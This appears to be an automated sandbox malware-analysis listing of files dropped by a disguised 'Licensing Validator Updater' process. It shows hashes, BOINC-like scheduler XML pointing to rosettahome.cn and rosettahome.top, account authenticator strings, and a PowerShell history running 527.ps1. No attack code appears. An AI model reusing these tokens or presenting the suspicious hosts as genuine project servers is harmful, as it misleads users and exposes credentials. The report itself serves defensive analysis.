                                                                                                                                                                                                                                                                                                                                                      Preview:<rss_feeds>.. <rss_feed>.. <url>http://rosettahome.cn/rosettahome/notices.php?userid=1&amp;auth=1_1a362b2ad50985e203845fe44682096e</url>.. <poll_interval>86400.000000</poll_interval>.. <next_poll_time>0.000000</next_poll_time>.. </rss_feed>..</rss_feeds>..

                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Licensing Validator Updater\notices\rosettahome.cn_rosettahome_notices.php.xml

                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:XML 1.0 document, ASCII text
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):359
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.804733975144003
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:6:TMVBdIpQFqVX+vHMQc4I4YhFtLqi8LfzMelGDUigxhN6q9Q54mhNZrvHGd:TMHdIWE4I4mKi2cD2vTWf+d
                                                                                                                                                                                                                                                                                                                                                      MD5:C8388AC433DE11D6B3F0F83A39177A3A
                                                                                                                                                                                                                                                                                                                                                      SHA1:EE464ACF637E28D908BEE66E6E3636C5E9E90593
                                                                                                                                                                                                                                                                                                                                                      SHA-256:442090429C699DA291940D7230EA46DA588F860EB015B491BE24CA3D3D777EDE
                                                                                                                                                                                                                                                                                                                                                      SHA-512:036728476536D80D7B0D4BA71BC9AFF27047BF8B0801F407AF8D52008BFDC172718F3762FD0E0DFEFC7BFB5EF8CEB436E554319F10736663057296E553555A1C
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="ISO-8859-1" ?>. <rss version="2.0">. <channel>. <title>REPLACE WITH PROJECT NAME notices</title>. <link>http://rosettahome.cn/rosettahome/</link>. <description>Notices</description>. <lastBuildDate>Tue, 14 Jan 2025 19:46:43 GMT</lastBuildDate>. . </channel>. </rss>.

                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Licensing Validator Updater\sched_reply_rosettahome.cn_rosettahome.xml

                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):1816
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.890120869422368
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:48:rb4OWswnCIk6kMG1LOkJPk7jeoAgvC1rahj0NXNv:A5sdVM4ZS7jZAbOadv
                                                                                                                                                                                                                                                                                                                                                      MD5:3EDB263889DDC690A25D6E903996614F
                                                                                                                                                                                                                                                                                                                                                      SHA1:F85DB87671EA297D1CCA4A16CB921E6B391D4D18
                                                                                                                                                                                                                                                                                                                                                      SHA-256:9AB49EBABD0216CD925D9D7B26DAF8B8F87359A07928A6296B98992FFCBBD8AF
                                                                                                                                                                                                                                                                                                                                                      SHA-512:E3C7729C39AE8B26F2E943BE252D0815DB0D27EDAAFF5B1267D532CDD10130AF178D8BA09D22BE8A8626180293014BADE2CB1172EB05DF53BBFF7BDF56F6CFEA
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:<scheduler_reply>.<scheduler_version>801</scheduler_version>.<dont_use_dcf/>.<master_url>http://rosettahome.cn/rosettahome/</master_url>.<request_delay>2.000000</request_delay>.<message priority="low">Project has no tasks available</message>.<project_name>rosettahome</project_name>.<next_rpc_delay>300.000000</next_rpc_delay>.<userid>1</userid>.<user_name>rosettatest</user_name>.<user_total_credit>0.000000</user_total_credit>.<user_expavg_credit>0.000000</user_expavg_credit>.<user_create_time>1718459909</user_create_time>.<email_hash>edd98bc9b7df6fce0618815ed033a68a</email_hash>.<cross_project_id>27d0816fe7754f6d58533d96ebd9b395</cross_project_id>.<external_cpid>f32080c087a0f17200379c858e8b43a3</external_cpid>..<host_total_credit>0.000000</host_total_credit>.<host_expavg_credit>0.000000</host_expavg_credit>.<host_venue></host_venue>.<host_create_time>1736884001</host_create_time>.<team_name></team_name>.<gui_urls>. <gui_url>. <name>Message boards</name>. <description>Co

                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Licensing Validator Updater\sched_reply_rosettahome.top_rosettahome.xml

                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):2399
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.887939208206757
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:48:rb4OWswnCIk6kMG1POkJPk7jW3jRKvb9oAgvC1rahj0NXNv:A5sdVMeZS7jDuAbOadv
                                                                                                                                                                                                                                                                                                                                                      MD5:8E6746651ACE86D4CA84CA8EAB686ABB
                                                                                                                                                                                                                                                                                                                                                      SHA1:8E12A67878528ABE778965D269263063C290B90C
                                                                                                                                                                                                                                                                                                                                                      SHA-256:F34B0978E2D66B5C9975D31FB6C21F8F462E13A99BF1629F5F555281CBF2AB97
                                                                                                                                                                                                                                                                                                                                                      SHA-512:8A3D613F06A4F8894E6CAD10B5470E199094B19D80BD63F449F38D37842A528CBBEBBF68C0FF5D7F4BEE635AA77F6A52AA3957E0BAE12A7AF10FEDF3726F2CEF
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:<scheduler_reply>.<scheduler_version>801</scheduler_version>.<dont_use_dcf/>.<master_url>http://rosettahome.cn/rosettahome/</master_url>.<request_delay>2.000000</request_delay>.<message priority="low">Project has no tasks available</message>.<project_name>rosettahome</project_name>.<next_rpc_delay>300.000000</next_rpc_delay>.<userid>1</userid>.<user_name>rosettatest</user_name>.<user_total_credit>0.000000</user_total_credit>.<user_expavg_credit>0.000000</user_expavg_credit>.<user_create_time>1718459909</user_create_time>.<email_hash>edd98bc9b7df6fce0618815ed033a68a</email_hash>.<cross_project_id>27d0816fe7754f6d58533d96ebd9b395</cross_project_id>.<external_cpid>f32080c087a0f17200379c858e8b43a3</external_cpid>..<hostid>17205</hostid>.<host_total_credit>0.000000</host_total_credit>.<host_expavg_credit>0.000000</host_expavg_credit>.<host_venue></host_venue>.<host_create_time>1736884001</host_create_time>.<team_name></team_name>.<code_sign_key>.1024.b7c89af6ddecc40111fd8a612dba39d8d17b6008

                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Licensing Validator Updater\sched_request_rosettahome.cn_rosettahome.xml

                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (399)
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):6530
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.949084413956154
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:96:h9SO5qe6Ou/DbQ/quCB3HDeBVIid7W4WeOIKGa+/vLvuEb9xP:hF5DFyB3oIip8eOni/Ddbz
                                                                                                                                                                                                                                                                                                                                                      MD5:DFFAF3A2FC3E7A4CA05046200EC6DB2B
                                                                                                                                                                                                                                                                                                                                                      SHA1:CF911B25BF31DBB516B11E63F3670598931546B9
                                                                                                                                                                                                                                                                                                                                                      SHA-256:57C06B620B73FCE954ABD380EB8E5B818A60F64034D8D5836D331A4DBC2D3477
                                                                                                                                                                                                                                                                                                                                                      SHA-512:ECA90BB915A6F2807A40AC181965AB8DA506178954331209698B4993B188E4E035CC02677CF89F5AD9618FF44781FD7924177F35850899B8D99755D65CF6CC20
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:<scheduler_request>. <authenticator>1_dfdacac1d4e91a74e91cfc18f518e1de</authenticator>. <hostid>17205</hostid>. <rpc_seqno>0</rpc_seqno>. <core_client_major_version>8</core_client_major_version>. <core_client_minor_version>0</core_client_minor_version>. <core_client_release>2</core_client_release>. <resource_share_fraction>1.000000</resource_share_fraction>. <rrs_fraction>1.000000</rrs_fraction>. <prrs_fraction>1.000000</prrs_fraction>. <duration_correction_factor>1.000000</duration_correction_factor>. <allow_multiple_clients>0</allow_multiple_clients>. <sandbox>0</sandbox>. <dont_send_work>0</dont_send_work>. <work_req_seconds>207360.000000</work_req_seconds>. <cpu_req_secs>207360.000000</cpu_req_secs>. <cpu_req_instances>4.000000</cpu_req_instances>. <estimated_delay>0.000000</estimated_delay>. <client_cap_plan_class>1</client_cap_plan_class>. <platform_name>windows_x86_64</platform_name>. <alt_platform>. <name>window

                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Licensing Validator Updater\sched_request_rosettahome.top_rosettahome.xml

                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (399)
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):5860
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.927180403575281
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:96:h8sOre6Ou/DbQ/quCB3HDeBVDid7WiW+/XGa+/vLvuEb9xTS:hGmFyB3oDipG+/Xi/Ddbi
                                                                                                                                                                                                                                                                                                                                                      MD5:B5EE428D851B10A5C60EE08E9238BF3A
                                                                                                                                                                                                                                                                                                                                                      SHA1:DE504F81565007A64B0A684A154EEE434A4624C8
                                                                                                                                                                                                                                                                                                                                                      SHA-256:AB8E8F6912EAA078D9BCA9DB12D214BCD2ACF48F0F3E7567330B2AFD5CA81E37
                                                                                                                                                                                                                                                                                                                                                      SHA-512:BD1FAFBC52D84218F72C555B1A5390205E3BCC6A6FCAD9C84DC5774027FADAF6A3578FDEFE565F23F46900F46136FD603B97C21B86A89A58BA8AF1D977B24186
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:<scheduler_request>. <authenticator>1_dfdacac1d4e91a74e91cfc18f518e1de</authenticator>. <hostid>0</hostid>. <rpc_seqno>0</rpc_seqno>. <core_client_major_version>8</core_client_major_version>. <core_client_minor_version>0</core_client_minor_version>. <core_client_release>2</core_client_release>. <resource_share_fraction>1.000000</resource_share_fraction>. <rrs_fraction>1.000000</rrs_fraction>. <prrs_fraction>1.000000</prrs_fraction>. <duration_correction_factor>1.000000</duration_correction_factor>. <allow_multiple_clients>0</allow_multiple_clients>. <sandbox>0</sandbox>. <dont_send_work>0</dont_send_work>. <work_req_seconds>1.000000</work_req_seconds>. <cpu_req_secs>1.000000</cpu_req_secs>. <cpu_req_instances>0.000000</cpu_req_instances>. <estimated_delay>0.000000</estimated_delay>. <client_cap_plan_class>1</client_cap_plan_class>. <platform_name>windows_x86_64</platform_name>. <alt_platform>. <name>windows_intelx86</na

                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Licensing Validator Updater\statistics_rosettahome.cn_rosettahome.xml (copy)

                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):429
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.530741820498357
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:12:YwRXfi2WfRXPcMfilQ9Ik6k/W059WOkJPk/JqR9twRn:Za2srmk6kO7OkJPkqGn
                                                                                                                                                                                                                                                                                                                                                      MD5:AC0402B70EAFE79B6127F93E4736362C
                                                                                                                                                                                                                                                                                                                                                      SHA1:6A9E0B33FD68BC41E4971A49553CB9C04DB0D2E5
                                                                                                                                                                                                                                                                                                                                                      SHA-256:5DDFE28A7C9B27D32F6C55648D26C60F4BF61F9028249D4F9059075FAE169027
                                                                                                                                                                                                                                                                                                                                                      SHA-512:DC1F530D9C07FFAFD21338F2A9E9BA76FC8AF84F592B74CD925815994A55351AAC05E06FD91A8337ED3D84609C347AF102B8DBF7D164EBC2BADAE4FF11E1038C
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:<project_statistics>.. <master_url>http://rosettahome.cn/rosettahome/</master_url>.. <daily_statistics>.. <day>1736812800.000000</day>.. <user_total_credit>0.000000</user_total_credit>.. <user_expavg_credit>0.000000</user_expavg_credit>.. <host_total_credit>0.000000</host_total_credit>.. <host_expavg_credit>0.000000</host_expavg_credit>.. </daily_statistics>..</project_statistics>..

                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Licensing Validator Updater\statistics_rosettahome.top_rosettahome.xml (copy)

                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):429
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.530741820498357
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:12:YwRXfi2WfRXPcMfilQ9Ik6k/W059WOkJPk/JqR9twRn:Za2srmk6kO7OkJPkqGn
                                                                                                                                                                                                                                                                                                                                                      MD5:AC0402B70EAFE79B6127F93E4736362C
                                                                                                                                                                                                                                                                                                                                                      SHA1:6A9E0B33FD68BC41E4971A49553CB9C04DB0D2E5
                                                                                                                                                                                                                                                                                                                                                      SHA-256:5DDFE28A7C9B27D32F6C55648D26C60F4BF61F9028249D4F9059075FAE169027
                                                                                                                                                                                                                                                                                                                                                      SHA-512:DC1F530D9C07FFAFD21338F2A9E9BA76FC8AF84F592B74CD925815994A55351AAC05E06FD91A8337ED3D84609C347AF102B8DBF7D164EBC2BADAE4FF11E1038C
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:<project_statistics>.. <master_url>http://rosettahome.cn/rosettahome/</master_url>.. <daily_statistics>.. <day>1736812800.000000</day>.. <user_total_credit>0.000000</user_total_credit>.. <user_expavg_credit>0.000000</user_expavg_credit>.. <host_total_credit>0.000000</host_total_credit>.. <host_expavg_credit>0.000000</host_expavg_credit>.. </daily_statistics>..</project_statistics>..

                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Licensing Validator Updater\stderrgpudetect.txt

                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):73
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.4110213048329925
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:gFkdNzK5J4HlLezGQv:GkryaFLen
                                                                                                                                                                                                                                                                                                                                                      MD5:16D1F3B711B8570ABF4B8293FBE59F3F
                                                                                                                                                                                                                                                                                                                                                      SHA1:5C15DF37B0C82E9EDBF13F04BEDC8AA823AD9CB5
                                                                                                                                                                                                                                                                                                                                                      SHA-256:641C5D05245023008E98680785010615F7C5BBDDFAF76D0A8CA9E75FE70C5F5B
                                                                                                                                                                                                                                                                                                                                                      SHA-512:F25AC7A837B0C74309420386B6C030F7A4E195E69E738501ACD034972672E67CF1167CCC276220ADF537BB49B20AE7BC0309AA69607E3FA9B0DED056E06BF86A
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:No NVIDIA library found..No ATI library found...No OpenCL library found..

                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Licensing Validator Updater\temp.xml

                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):118
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.469520017712775
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:bpNy/ZyFFj+ALzVV/aFRqLXVgF/Z8WtdVVt4bKKPy0hdNyn:bmxy/j+APSFRqyR8Wtdl4Wcvyn
                                                                                                                                                                                                                                                                                                                                                      MD5:CB723FE22B7435EBEE570841E2E39F26
                                                                                                                                                                                                                                                                                                                                                      SHA1:BE8A67E0DACE13A6DE166A9D56FB14DEE7454A8E
                                                                                                                                                                                                                                                                                                                                                      SHA-256:3638C84734824C148862D42CD2E2693614C664101DFD84DE90D6F49DC6824645
                                                                                                                                                                                                                                                                                                                                                      SHA-512:2EB64AC821CA4FC6AF97B9FE8BCC539EE1791A0F24E773F9D542EABED8C57BFF021AE88DF6ABDCA2727B2BE2F91ABE3167D76415F5924BBD50E79DDCE9313E5F
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:<daily_xfers>..<dx>.. <when>20102</when>.. <up>0.000000</up>.. <down>6192.000000</down>..</dx>..</daily_xfers>..

                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Licensing Validator Updater\temp_acct.xml

                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):938
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.596457271252631
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:24:c23hSZMAkRA/oAUjDbJv4jFW1YahjyOeJ:RxSpd/oA4vL1YaUd
                                                                                                                                                                                                                                                                                                                                                      MD5:2D2869CF40771468F523051ED737CB33
                                                                                                                                                                                                                                                                                                                                                      SHA1:2110C8A839EF0509FB3BEC0E8967C3281C86A17E
                                                                                                                                                                                                                                                                                                                                                      SHA-256:191E62287F8136AEAED806639F7FFFCBA7404575C5AF12108582831200450AF9
                                                                                                                                                                                                                                                                                                                                                      SHA-512:DCEE37CCB813D156210BC7053E5E57C06175C64A3706205F1F17B73E698400E2EE1FE7738EA6E638829F3AD3BF5A9F3731EA4AA3DE7AAB6B6EAE923D3E3F80B9
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:<account>.. <master_url>http://rosettahome.cn/rosettahome/</master_url>.. <authenticator>1_dfdacac1d4e91a74e91cfc18f518e1de</authenticator>.. <project_name>rosettahome</project_name>..<project_preferences>..</project_preferences>..<gui_urls>.... <gui_url>.. <name>Message boards</name>.. <description>Correspond with other users on the rosettahome message boards</description>.. <url>http://rosettahome.cn/rosettahome/forum_index.php</url>.. </gui_url>.. <gui_url>.. <name>Your account</name>.. <description>View your account information</description>.. <url>http://rosettahome.cn/rosettahome/home.php</url>.. </gui_url>.. <gui_url>.. <name>Your tasks</name>.. <description>View the last week or so of computational work</description>.. <url>http://rosettahome.cn/rosettahome/results.php?userid=1</url>.. </gui_url>.. ..</gui_urls>..</account>..

                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Licensing Validator Updater\temp_stats.xml

                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):429
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.530741820498357
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:12:YwRXfi2WfRXPcMfilQ9Ik6k/W059WOkJPk/JqR9twRn:Za2srmk6kO7OkJPkqGn
                                                                                                                                                                                                                                                                                                                                                      MD5:AC0402B70EAFE79B6127F93E4736362C
                                                                                                                                                                                                                                                                                                                                                      SHA1:6A9E0B33FD68BC41E4971A49553CB9C04DB0D2E5
                                                                                                                                                                                                                                                                                                                                                      SHA-256:5DDFE28A7C9B27D32F6C55648D26C60F4BF61F9028249D4F9059075FAE169027
                                                                                                                                                                                                                                                                                                                                                      SHA-512:DC1F530D9C07FFAFD21338F2A9E9BA76FC8AF84F592B74CD925815994A55351AAC05E06FD91A8337ED3D84609C347AF102B8DBF7D164EBC2BADAE4FF11E1038C
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:<project_statistics>.. <master_url>http://rosettahome.cn/rosettahome/</master_url>.. <daily_statistics>.. <day>1736812800.000000</day>.. <user_total_credit>0.000000</user_total_credit>.. <user_expavg_credit>0.000000</user_expavg_credit>.. <host_total_credit>0.000000</host_total_credit>.. <host_expavg_credit>0.000000</host_expavg_credit>.. </daily_statistics>..</project_statistics>..

                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Licensing Validator Updater\time_stats_log

                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):61
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.360664591483912
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:LvcRVdXEO6MlT59XcSI6GQ/:wRP6Y5iSHGQ/
                                                                                                                                                                                                                                                                                                                                                      MD5:014F956507C7ACBDB19B81A43EB366F9
                                                                                                                                                                                                                                                                                                                                                      SHA1:037A8B30F9CC0C4DC6ABE22A6012431F1A762744
                                                                                                                                                                                                                                                                                                                                                      SHA-256:827AE1CE33FC8B4D789ECB250AA4B5F345EAB81FF37AF6655634F6D58F9A617A
                                                                                                                                                                                                                                                                                                                                                      SHA-512:EA68F018022D13E9B6F83ED0FBFBC07BAE83473E3F283C60162294BB86E057ABB0CABC43C513E2B7715265985F238CD107B7C349D2A053E2590B97D8EA81DDEF
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:1736883991.082867 power_on..1736884022.005878 net_connected..

                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\44457de06a537985124f90911a5dd7b7_9e146be9-c76a-4720-bcdb-53011b87bd06

                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Roaming\Licensing Validator Updater\.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):45
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.9111711733157262
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:/lwltjMl:W1k
                                                                                                                                                                                                                                                                                                                                                      MD5:C70557EF5BCA1A1D99325A077BF9B972
                                                                                                                                                                                                                                                                                                                                                      SHA1:7E056B60C432420F0CFB3327AFFD1364663AF7A8
                                                                                                                                                                                                                                                                                                                                                      SHA-256:53EEA1594C610579360072DEADF876F0C8CC08D6503525391938D5536C7B6853
                                                                                                                                                                                                                                                                                                                                                      SHA-512:E5E27814EE868D2B8B1A9ACDE6516D7B6125D82CB64904E1D3FCE3E429849099B80F459B4C1735ABC292028CEDDE71341F61E00B783710302CB2D21D34436552
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:........................................user.

                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt

                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):81
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.214481943140828
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:LjfemSv6qWAXvv4LsV5QCyBdhWxv:HqH4L05Q7bAxv
                                                                                                                                                                                                                                                                                                                                                      MD5:0889C72D62B6CB979A66532D3C005CB0
                                                                                                                                                                                                                                                                                                                                                      SHA1:DC75FF40A09946978BFE158CA517ED2B7689772F
                                                                                                                                                                                                                                                                                                                                                      SHA-256:D994AA37730B97DD64EB39E53ED29E6FDCD9827B69395304D852DBEEB39520FB
                                                                                                                                                                                                                                                                                                                                                      SHA-512:AB16659373A24D9FE43291C34B74765A24C7DCD15C6076AC2B2BE8393ACD1F8D371A0C12F0A967BA1F449B74DD2234FFF94DEC0B7166F1A9D9E2E64E472193BF
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                                      Preview:start cmd..cd ..\users..cd \..cd users..cd .\user\desktop\527..dir... .\527.ps1..

                                                                                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                                                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                                      Size (bytes):5440
                                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.9297324647367264
                                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                                      SSDEEP:48:uO518dpg8MwCVU272pukvjwortKGia7DSogZowNKGia7DSogZoJG1:P8nMwCaIrkvMCKGibHXKGibHk4
                                                                                                                                                                                                                                                                                                                                                      MD5:9265FB37DA923227C0E5C510774AF4AD
                                                                                                                                                                                                                                                                                                                                                      SHA1:884DB23CBF8FE88141284D9907CD695B1C326F6B
                                                                                                                                                                                                                                                                                                                                                      SHA-256:959F4AF3D0CBBE9AA0E85A2FA428D25436C05B155546FE2CDB292BDF27CE6E45
                                                                                                                                                                                                                                                                                                                                                      SHA-512:D0DDE7E8D419B36093A5CDA7843BAEDF2471675660232B9C5E83A101674E93EF6502F2659A711A4053BF078F5AFE6430807EAC270C41F3A5AD6743189594EDC3
                                                                                                                                                                                                                                                                                                                                                      Malicious:false
